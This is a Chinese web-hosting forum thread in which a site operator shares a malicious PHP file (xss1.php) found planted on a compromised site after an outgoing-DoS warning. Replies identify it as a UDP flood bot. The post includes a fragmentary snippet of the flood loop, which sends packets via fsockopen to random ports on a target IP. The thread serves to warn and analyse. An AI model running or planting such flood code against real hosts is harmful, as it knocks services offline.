立即注册  找回密码
 立即注册
CeraNetworksBGVM服务器主机交流会员请立即修改密码Sharktech防护
查看: 145|回复: 9

发一个php 攻击代码.大家注意.

[复制链接]

发一个php 攻击代码.大家注意.

[复制链接]

18

主题

182

回帖

684

积分

高级会员

积分
684
诡谲

18

主题

182

回帖

684

积分

高级会员

积分
684
2010-12-4 12:03:10 | 显示全部楼层 |阅读模式

今天收到服务商的警告.说有outgoing dos attack.并给了几个IP让我检查.
检查后发现一个用户的网站应该是被挂马,许多目录下存在这样一个文件: xss1.php,里面的内容如下:[ol]
  • $max_time){                break;        }               
  • $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);        
  • if($fp){                fwrite($fp, $out);               
  • fclose($fp);        }}
  • echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";?>[/ol]复制代码请勿用于非法用途

    [ 本帖最后由 诡谲 于 2010-12-4 12:19 编辑 ]
  • 回复

    使用道具 举报

    60

    主题

    1120

    回帖

    3733

    积分

    论坛元老

    积分
    3733
    cnx

    60

    主题

    1120

    回帖

    3733

    积分

    论坛元老

    积分
    3733
    2010-12-4 12:25:28 | 显示全部楼层
    表示看不懂代码的我路过。

    回复

    使用道具 举报

    42

    主题

    223

    回帖

    1025

    积分

    金牌会员

    积分
    1025
    hz555

    42

    主题

    223

    回帖

    1025

    积分

    金牌会员

    积分
    1025
    2010-12-4 12:26:40 | 显示全部楼层
    这个应该不是马吧!都是代码!没连接地址!
    回复

    使用道具 举报

    35

    主题

    181

    回帖

    877

    积分

    高级会员

    积分
    877
    tc101

    35

    主题

    181

    回帖

    877

    积分

    高级会员

    积分
    877
    2010-12-4 12:27:54 | 显示全部楼层
    看不懂
    回复

    使用道具 举报

    15

    主题

    487

    回帖

    1673

    积分

    金牌会员

    积分
    1673
    wdlth

    15

    主题

    487

    回帖

    1673

    积分

    金牌会员

    积分
    1673
    2010-12-4 12:27:55 | 显示全部楼层
    用socket而已,可以禁用的。
    回复

    使用道具 举报

    328

    主题

    1462

    回帖

    6075

    积分

    论坛元老

    积分
    6075
    yugan300

    328

    主题

    1462

    回帖

    6075

    积分

    论坛元老

    积分
    6075
    2010-12-4 12:28:43 | 显示全部楼层
    fsockopen 使用udp协议 打开远端服务器的一个随机端口
    发射65535次。
    回复

    使用道具 举报

    9

    主题

    29

    回帖

    155

    积分

    注册会员

    积分
    155
    小白

    9

    主题

    29

    回帖

    155

    积分

    注册会员

    积分
    155
    2010-12-4 12:29:06 | 显示全部楼层
    难道这是dos??
    回复

    使用道具 举报

    12

    主题

    58

    回帖

    188

    积分

    注册会员

    积分
    188
    liheyuan

    12

    主题

    58

    回帖

    188

    积分

    注册会员

    积分
    188
    2010-12-4 12:29:07 | 显示全部楼层
    这个是被挂的马吧?
    相当于个小“僵尸”了,呵呵,接受黑客的URL输入参数IP向该IP的端口发UDP Flood攻击。。
    网站有上传功能的应该小心。

    [ 本帖最后由 liheyuan 于 2010-12-4 12:30 编辑 ]
    回复

    使用道具 举报

    11

    主题

    119

    回帖

    395

    积分

    中级会员

    积分
    395
    zllovesuki

    11

    主题

    119

    回帖

    395

    积分

    中级会员

    积分
    395
    2010-12-4 12:30:08 | 显示全部楼层
    这是端口扫描。
    回复

    使用道具 举报

    11

    主题

    119

    回帖

    395

    积分

    中级会员

    积分
    395
    zllovesuki

    11

    主题

    119

    回帖

    395

    积分

    中级会员

    积分
    395
    2010-12-4 12:30:45 | 显示全部楼层
    呃,看错了,看到65535就自动默认了。。
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Archiver|小黑屋|HS2V主机综合交流论坛

    GMT+8, 2025-3-4 19:38 , Processed in 0.022998 second(s), 3 queries , Gzip On, Redis On.

    Powered by Discuz! X3.5

    © 2001-2024 Discuz! Team.

    快速回复 返回顶部 返回列表